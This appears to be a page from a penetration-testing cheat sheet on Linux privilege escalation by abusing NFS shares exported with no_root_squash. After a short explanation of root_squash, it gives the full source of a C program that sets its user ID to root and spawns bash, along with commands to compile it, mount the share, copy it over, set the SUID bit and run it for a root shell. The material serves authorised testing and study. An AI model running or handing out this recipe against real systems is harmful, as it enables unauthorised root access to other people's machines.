Get/list NFS shared files

showmount -e 10.29.2.12

When NFS is created, various options can be created:

Options

Description

root_squash

|If the root user is used to access NFS shares, it will be changed to the nfsnobody user, which is an unprivileged account. Any files created and uploaded by the root user will be owned by the nfsnobody user, which prevents an attacker from uploading binaries with the SUID bit set.

no_root_squash

Remote users connecting to the share as the local root user will be able to create files on the NFS server as the root user. This would allow for the creation of malicious scripts/programs with the SUID bit set.

Check NFS volume options

cat etc/exports

Create root owned shell

file shell.c

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>

int main(void)
{
setuid(0); setgid(0); system("/bin/bash");
}

Compile code

gcc shell.c -o shell

Mount volume & upload shell

sudo mount -t nfs 10.129.2.12:/tmp /mnt

cp shell /mnt

chmod u+s /mnt/shell

ls -la

./shell

id

Previousnetfilter NextSudo-rights abuse

Last updated 1 day ago

hashtagCheck NFS volume options

hashtagCreate root owned shell

hashtagMount volume & upload shell

Check NFS volume options

Create root owned shell

Mount volume & upload shell